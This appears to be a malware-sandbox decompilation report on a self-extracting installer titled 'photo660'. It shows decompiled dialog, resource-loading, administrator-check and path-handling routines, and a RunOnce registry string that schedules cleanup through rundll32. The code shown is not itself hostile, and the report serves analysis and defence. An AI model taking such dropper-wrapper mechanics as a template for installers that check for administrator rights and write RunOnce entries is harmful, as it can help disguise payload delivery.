                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 3027380567-2554356261
                                                                                                                                                                                                        • Opcode ID: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                        • Instruction ID: 7f2562d8f57296b15651d63e88d2ab7e6d1ea9574cf4e17745e8897ec9a426d1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1319371B00218BBDF21DB65DC49FEB77BCEB15700F0001AAB50DAA050EE746B89CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00A93100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xa98590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xa98590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E00A943D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xa98d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "photo660");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xa988b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00A930C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}










APIs
• EndDialog.USER32(?,00000000), ref: 00A9313B
• GetDesktopWindow.USER32 ref: 00A9314B
• SetDlgItemTextA.USER32(?,00000834), ref: 00A9316A
• SetWindowTextA.USER32(?,photo660), ref: 00A93176
• SetForegroundWindow.USER32(?), ref: 00A9317D
• GetDlgItem.USER32(?,00000834), ref: 00A93185
• GetWindowLongA.USER32(00000000,000000FC), ref: 00A93190
• SetWindowLongA.USER32(00000000,000000FC,00A930C0), ref: 00A931A3
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A931CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: photo660
• API String ID: 3785188418-1757243477
• Opcode ID: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
• Instruction ID: 895e9458c4e315d07ccdcdb139f400635ec7b22de0ad2a2398bb7665531fe5a2
• Opcode Fuzzy Hash: f7e62517c0f203b1db1783790b9c3f190e73328708a383651fb0ee994f28018a
• Instruction Fuzzy Hash: 5B117F32348221BBDF119BA89C0CB9A3AF4FB5A721F204713F825951F0DF759A42C696
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00A9468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}









APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
• SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
• LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
• LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
• memcpy_s.MSVCRT ref: 00A946E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$photo660
• API String ID: 3370778649-2621105198
• Opcode ID: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
• Instruction ID: 9d9cfc21d34befd617bc1e1335bd0b0addbfc6407c857c45ceb75964476b921e
• Opcode Fuzzy Hash: 96aca75a9b051fbf5405e3ab5f0298e9928cb0f6af38c1c9caeb0b7e5d8c884d
• Instruction Fuzzy Hash: 0601D1723402207BE7205BE56C4DF6B3E6CDBDAB62F140417FB4A86190CEA1884383E2
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00A917EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xa9a288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                        • Instruction ID: d2ae7fa2e47dd2e96da184855b3e323dcec41bfc05ddf5d7bd32fdc92e6024eb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ea42cda60d155b874b81d66151c63b751fbdd4e5be84dc0fc964270e75b6818
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5118131F00209ABDB10DFA4DC49ABEBBB8EF44701F10456BFA12E6290DE308D018B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A93450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E00A943D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "photo660");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xa99404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xa991dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00A93490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A9349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00A934B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00A934C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00A934CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00A934D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 852535152-1757243477
                                                                                                                                                                                                        • Opcode ID: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                        • Instruction ID: 78a44bd075de18e715d94eb13e92715ccdd260d55f59fb6f0fe47dde640acd54
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25f5efad86de58d6170530d94ff63d1eb7c70988068b6f6d22acd71a38d91f24
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2601B132340114ABDF269FA9DC0C96E3AF4EB89702F224126F956865A0CF719F43CBC5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00A92AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E00A965E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x00a92b2e
                                                                                                                                                                                                        0x00a92b33
                                                                                                                                                                                                        0x00a92b39
                                                                                                                                                                                                        0x00a92b3c
                                                                                                                                                                                                        0x00a92b3c
                                                                                                                                                                                                        0x00a92b3e
                                                                                                                                                                                                        0x00a92b3f
                                                                                                                                                                                                        0x00a92b55
                                                                                                                                                                                                        0x00a92b5d
                                                                                                                                                                                                        0x00a92b64
                                                                                                                                                                                                        0x00a92b64
                                                                                                                                                                                                        0x00a92b7a
                                                                                                                                                                                                        0x00a92b7f
                                                                                                                                                                                                        0x00a92b81
                                                                                                                                                                                                        0x00a92b81
                                                                                                                                                                                                        0x00a92b84
                                                                                                                                                                                                        0x00a92b84
                                                                                                                                                                                                        0x00a92b86
                                                                                                                                                                                                        0x00a92b87
                                                                                                                                                                                                        0x00a92bbf
                                                                                                                                                                                                        0x00a92bc1
                                                                                                                                                                                                        0x00a92bc1
                                                                                                                                                                                                        0x00a92b26
                                                                                                                                                                                                        0x00a92bda
                                                                                                                                                                                                        0x00a92bda
                                                                                                                                                                                                        0x00a92be6
                                                                                                                                                                                                        0x00a92be6
                                                                                                                                                                                                        0x00a92bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A92AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A92AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00A92B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00A92B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00A92B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00A92BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                        • Instruction ID: 15b1386419034eab08e3b6eff8aaa4ecc41ec0eebcd8d74a5edd9c0943868fc2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A141D0347042466EDF159F249C54BFD7BE99FA6310F24419BE8C287202DF258E86CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00A943D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        0x00a94484
                                                                                                                                                                                                        0x00a9448a
                                                                                                                                                                                                        0x00a94492
                                                                                                                                                                                                        0x00a94496
                                                                                                                                                                                                        0x00a94496
                                                                                                                                                                                                        0x00a94486
                                                                                                                                                                                                        0x00a94486
                                                                                                                                                                                                        0x00a94486
                                                                                                                                                                                                        0x00a944b8

APIs
